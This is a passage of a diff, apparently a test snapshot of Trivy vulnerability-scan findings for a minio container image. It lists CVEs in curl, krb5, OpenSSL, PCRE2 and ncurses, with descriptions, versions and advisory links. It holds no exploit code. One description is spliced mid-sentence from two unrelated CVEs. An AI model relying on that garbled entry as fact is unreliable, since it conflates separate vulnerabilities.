TERM environment variable.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", + "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", }, { "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://security.gentoo.org/glsa/202212-01", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://support.apple.com/kb/HT213604", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://support.apple.com/kb/HT213605", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://ubuntu.com/security/notices/USN-5702-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://ubuntu.com/security/notices/USN-5702-2", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://ubuntu.com/security/notices/USN-5823-1", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5330", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1586", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "id": "CVE-2023-23914", + "installedVersion": "7.74.0-1.3+deb11u2", + "packageName": "libcurl4", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5809", - "https://access.redhat.com/security/cve/CVE-2022-1586", - "https://bugzilla.redhat.com/2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", - "https://errata.almalinux.org/8/ALSA-2022-5809.html", - "https://errata.rockylinux.org/RLSA-2022:5809", - "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", - "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", - "https://linux.oracle.com/cve/CVE-2022-1586.html", - "https://linux.oracle.com/errata/ELSA-2022-5809.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "https://access.redhat.com/security/cve/CVE-2023-23914", + "https://curl.se/docs/CVE-2023-23914.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", + "https://hackerone.com/reports/1813864", + "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", + "https://security.netapp.com/advisory/ntap-20230309-0006/", + "https://ubuntu.com/security/notices/USN-5891-1", + "https://www.cve.org/CVERecord?id=CVE-2023-23914", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", + "description": "A cleartext transmission of sensitive information vulnerability exists in curl n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Certificate policy check not enabled", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", - "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", - ], - }, - "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://ubuntu.com/security/notices/USN-5828-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5936-1", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/advisories/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this 